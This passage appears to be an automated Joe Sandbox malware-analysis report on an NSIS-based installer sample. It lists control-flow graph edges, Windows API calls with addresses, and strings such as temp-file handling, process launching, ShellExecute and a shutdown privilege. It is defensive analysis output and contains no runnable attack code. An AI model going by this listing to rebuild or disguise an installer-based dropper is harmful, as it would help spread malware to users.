4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3891 4038af #17 SetErrorMode OleInitialize 3892 406328 3 API calls 3891->3892 3893 4038f2 SHGetFileInfoW 3892->3893 3965 406035 lstrcpynW 3893->3965 3895 40391d GetCommandLineW 3966 406035 lstrcpynW 3895->3966 3897 40392f GetModuleHandleW 3898 403947 3897->3898 3899 405d32 CharNextW 3898->3899 3900 403956 CharNextW 3899->3900 3911 403968 3900->3911 3901 403a02 3902 403a21 GetTempPathW 3901->3902 3967 4037f8 3902->3967 3904 403a37 3906 403a3b GetWindowsDirectoryW lstrcatW 3904->3906 3907 403a5f DeleteFileW 3904->3907 3905 405d32 CharNextW 3905->3911 3909 4037f8 11 API calls 3906->3909 3975 4035b3 GetTickCount GetModuleFileNameW 3907->3975 3912 403a57 3909->3912 3910 403a73 3913 403af8 3910->3913 3915 405d32 CharNextW 3910->3915 3951 403add 3910->3951 3911->3901 3911->3905 3918 403a04 3911->3918 3912->3907 3912->3913 4060 403885 3913->4060 3919 403a8a 3915->3919 4067 406035 lstrcpynW 3918->4067 3930 403b23 lstrcatW lstrcmpiW 3919->3930 3931 403ab5 3919->3931 3920 403aed 3923 406113 9 API calls 3920->3923 3921 403bfa 3924 403c7d 3921->3924 3926 406328 3 API calls 3921->3926 3922 403b0d 3925 405ccc MessageBoxIndirectW 3922->3925 3923->3913 3927 403b1b ExitProcess 3925->3927 3929 403c09 3926->3929 3933 406328 3 API calls 3929->3933 3930->3913 3932 403b3f CreateDirectoryW SetCurrentDirectoryW 3930->3932 4068 4067aa 3931->4068 3935 403b62 3932->3935 3936 403b57 3932->3936 3937 403c12 3933->3937 4085 406035 lstrcpynW 3935->4085 4084 406035 lstrcpynW 3936->4084 3941 406328 3 API calls 3937->3941 3944 403c1b 3941->3944 3943 403b70 4086 406035 lstrcpynW 3943->4086 3945 403c69 ExitWindowsEx 3944->3945 3950 403c29 GetCurrentProcess 3944->3950 3945->3924 3949 403c76 3945->3949 3946 403ad2 4083 406035 lstrcpynW 3946->4083 3952 40141d 80 API calls 3949->3952 3954 403c39 3950->3954 4003 405958 3951->4003 3952->3924 3953 406831 18 API calls 3955 403b98 DeleteFileW 3953->3955 3954->3945 3956 403ba5 CopyFileW 3955->3956 3962 403b7f 3955->3962 3956->3962 3957 403bee 3958 406c94 42 API calls 3957->3958 3960 403bf5 3958->3960 3959 406c94 42 API calls 3959->3962 3960->3913 3961 406831 18 API calls 3961->3962 3962->3953 3962->3957 3962->3959 3962->3961 3964 403bd9 CloseHandle 3962->3964 4087 405c6b CreateProcessW 3962->4087 3964->3962 3965->3895 3966->3897 3968 406064 5 API calls 3967->3968 3969 403804 3968->3969 3970 40380e 3969->3970 3971 40674e 3 API calls 3969->3971 3970->3904 3972 403816 CreateDirectoryW 3971->3972 3973 405eab 2 API calls 3972->3973 3974 40382a 3973->3974 3974->3904 4090 405e7c GetFileAttributesW CreateFileW 3975->4090 3977 4035f3 3997 403603 3977->3997 4091 406035 lstrcpynW 3977->4091 3979 403619 4092 40677d lstrlenW 3979->4092 3983 40362a GetFileSize 3984 403726 3983->3984 3998 403641 3983->3998 4097 4032d2 3984->4097 3986 40372f 3988 40376b GlobalAlloc 3986->3988 3986->3997 4109 403368 SetFilePointer 3986->4109 3987 403336 ReadFile 3987->3998 4108 403368 SetFilePointer 3988->4108 3991 4037e9 3994 4032d2 6 API calls 3991->3994 3992 403786 3995 40337f 33 API calls 3992->3995 3993 40374c 3996 403336 ReadFile 3993->3996 3994->3997 4001 403792 3995->4001 4000 403757 3996->4000 3997->3910 3998->3984 3998->3987 3998->3991 3998->3997 3999 4032d2 6 API calls 3998->3999 3999->3998 4000->3988 4000->3997 4001->3997 4001->4001 4002 4037c0 SetFilePointer 4001->4002 4002->3997 4004 406328 3 API calls 4003->4004 4005 40596c 4004->4005 4006 405972 4005->4006 4007 405984 4005->4007 4123 405f7d wsprintfW 4006->4123 4008 405eff 3 API calls 4007->4008 4009 4059b5 4008->4009 4011 4059d4 lstrcatW 4009->4011 4013 405eff 3 API calls 4009->4013 4012 405982 4011->4012 4114 403ec1 4012->4114 4013->4011 4016 4067aa 18 API calls 4017 405a06 4016->4017 4018 405a9c 4017->4018 4020 405eff 3 API calls 4017->4020 4019 4067aa 18 API calls 4018->4019 4021 405aa2 4019->4021 4022 405a38 4020->4022 4023 405ab2 4021->4023 4024 406831 18 API calls 4021->4024 4022->4018 4026 405a5b lstrlenW 4022->4026 4029 405d32 CharNextW 4022->4029 4025 405ad2 LoadImageW 4023->4025 4125 403ea0 4023->4125 4024->4023 4027 405b92 4025->4027 4028 405afd RegisterClassW 4025->4028 4030 405a69 lstrcmpiW 4026->4030 4031 405a8f 4026->4031 4035 40141d 80 API calls 4027->4035 4033 405b9c 4028->4033 4034 405b45 SystemParametersInfoW CreateWindowExW 4028->4034 4036 405a56 4029->4036 4030->4031 4037 405a79 GetFileAttributesW 4030->4037 4039 40674e 3 API calls 4031->4039 4033->3920 4034->4027 4040 405b98 4035->4040 4036->4026 4041 405a85 4037->4041 4038 405ac8 4038->4025 4042 405a95 4039->4042 4040->4033 4043 403ec1 19 API calls 4040->4043 4041->4031 4044 40677d 2 API calls 4041->4044 4124 406035 lstrcpynW 4042->4124 4046 405ba9 4043->4046 4044->4031 4047 405bb5 ShowWindow LoadLibraryW 4046->4047 4048 405c38 4046->4048 4049 405bd4 LoadLibraryW 4047->4049 4050 405bdb GetClassInfoW 4047->4050 4051 405073 83 API calls 4048->4051 4049->4050 4052 405c05 DialogBoxParamW 4050->4052 4053 405bef GetClassInfoW RegisterClassW 4050->4053 4054 405c3e 4051->4054 4057 40141d 80 API calls 4052->4057 4053->4052 4055 405c42 4054->4055 4056 405c5a 4054->4056 4055->4033 4059 40141d 80 API calls 4055->4059 4058 40141d 80 API calls 4056->4058 4057->4033 4058->4033 4059->4033 4061 40389d 4060->4061 4062 40388f CloseHandle 4060->4062 4132 403caf 4061->4132 4062->4061 4067->3902 4185 406035 lstrcpynW 4068->4185 4070 4067bb 4071 405d85 4 API calls 4070->4071 4072 4067c1 4071->4072 4073 406064 5 API calls 4072->4073 4080 403ac3 4072->4080 4076 4067d1 4073->4076 4074 406809 lstrlenW 4075 406810 4074->4075 4074->4076 4078 40674e 3 API calls 4075->4078 4076->4074 4077 406301 2 API calls 4076->4077 4076->4080 4081 40677d 2 API calls 4076->4081 4077->4076 4079 406816 GetFileAttributesW 4078->4079 4079->4080 4080->3913 4082 406035 lstrcpynW 4080->4082 4081->4074 4082->3946 4083->3951 4084->3935 4085->3943 4086->3962 4088 405ca6 4087->4088 4089 405c9a CloseHandle 4087->4089 4088->3962 4089->4088 4090->3977 4091->3979 4093 40678c 4092->4093 4094 406792 CharPrevW 4093->4094 4095 40361f 4093->4095 4094->4093 4094->4095 4096 406035 lstrcpynW 4095->4096 4096->3983 4098 4032f3 4097->4098 4099 4032db 4097->4099 4102 403303 GetTickCount 4098->4102 4103 4032fb 4098->4103 4100 4032e4 DestroyWindow 4099->4100 4101 4032eb 4099->4101 4100->4101 4101->3986 4105 403311 CreateDialogParamW ShowWindow 4102->4105 4106 403334 4102->4106 4110 40635e 4103->4110 4105->4106 4106->3986 4108->3992 4109->3993 4111 40637b PeekMessageW 4110->4111 4112 406371 DispatchMessageW 4111->4112 4113 403301 4111->4113 4112->4111 4113->3986 4115 403ed5 4114->4115 4130 405f7d wsprintfW 4115->4130 4117 403f49 4118 406831 18 API calls 4117->4118 4119 403f55 SetWindowTextW 4118->4119 4120 403f70 4119->4120 4121 403f8b 4120->4121 4122 406831 18 API calls 4120->4122 4121->4016 4122->4120 4123->4012 4124->4018 4131 406035 lstrcpynW 4125->4131 4127 403eb4 4128 40674e 3 API calls 4127->4128 4129 403eba lstrcatW 4128->4129 4129->4038 4130->4117 4131->4127 4133 403cbd 4132->4133 4134 4038a2 4133->4134 4135 403cc2 FreeLibrary GlobalFree 4133->4135 4136 406cc7 4134->4136 4135->4134 4135->4135 4137 4067aa 18 API calls 4136->4137 4138 406cda 4137->4138 4139 406ce3 DeleteFileW 4138->4139 4140 406cfa 4138->4140 4179 4038ae CoUninitialize 4139->4179 4141 406e77 4140->4141 4183 406035 lstrcpynW 4140->4183 4147 406301 2 API calls 4141->4147 4167 406e84 4141->4167 4141->4179 4143 406d25 4144 406d39 4143->4144 4145 406d2f lstrcatW 4143->4145 4148 40677d 2 API calls 4144->4148 4146 406d3f 4145->4146 4150 406d4f lstrcatW 4146->4150 4152 406d57 lstrlenW FindFirstFileW 4146->4152 4149 406e90 4147->4149 4148->4146 4153 40674e 3 API calls 4149->4153 4149->4179 4150->4152 4151 4062cf 11 API calls 4151->4179 4156 406e67 4152->4156 4180 406d7e 4152->4180 4154 406e9a 4153->4154 4157 4062cf 11 API calls 4154->4157 4155 405d32 CharNextW 4155->4180 4156->4141 4158 406ea5 4157->4158 4159 405e5c 2 API calls 4158->4159 4160 406ead RemoveDirectoryW 4159->4160 4164 406ef0 4160->4164 4165 406eb9 4160->4165 4161 406e44 FindNextFileW 4163 406e5c FindClose 4161->4163 4161->4180 4163->4156 4166 404f9e 25 API calls 4164->4166 4165->4167 4168 406ebf 4165->4168 4166->4179 4167->4151 4170 4062cf 11 API calls 4168->4170 4169 4062cf 11 API calls 4169->4180 4171 406ec9 4170->4171 4174 404f9e 25 API calls 4171->4174 4172 406cc7 72 API calls 4172->4180 4173 405e5c 2 API calls 4175 406dfa DeleteFileW 4173->4175 4176 406ed3 4174->4176 4175->4180 4177 406c94 42 API calls 4176->4177 4177->4179 4178 404f9e 25 API calls 4178->4161 4179->3921 4179->3922 4180->4155 4180->4161 4180->4169 4180->4172 4180->4173 4180->4178 4181 404f9e 25 API calls 4180->4181 4182 406c94 42 API calls 4180->4182 4184 406035 lstrcpynW 4180->4184 4181->4180 4182->4180 4183->4143 4184->4180 4185->4070 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3717 4021b5 3718 40145c 18 API calls 3717->3718 3719 4021bb 3718->3719 3720 40145c 18 API calls 3719->3720 3721 4021c4 3720->3721 3722 40145c 18 API calls 3721->3722 3723 4021cd 3722->3723 3724 40145c 18 API calls 3723->3724 3725 4021d6 3724->3725 3726 404f9e 25 API calls 3725->3726 3727 4021e2 ShellExecuteW 3726->3727 3728 40221b 3727->3728 3729 40220d 3727->3729 3730 4062cf 11 API calls 3728->3730 3731 4062cf 11 API calls 3729->3731 3732 402230 3730->3732 3731->3728 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                          • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                        • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                        • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                        • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                        • String ID: New install of "%s" to "%s"${
                                                                                                                                                                        • API String ID: 2110491804-1641061399
                                                                                                                                                                        • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                        • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                        • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                        • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                        APIs
                                                                                                                                                                        • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                        • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                        • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                        • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                        • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                        • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                        • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                        • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                        • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                        • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                        • API String ID: 2435955865-3712954417
                                                                                                                                                                        • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                        • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                        • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                        • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
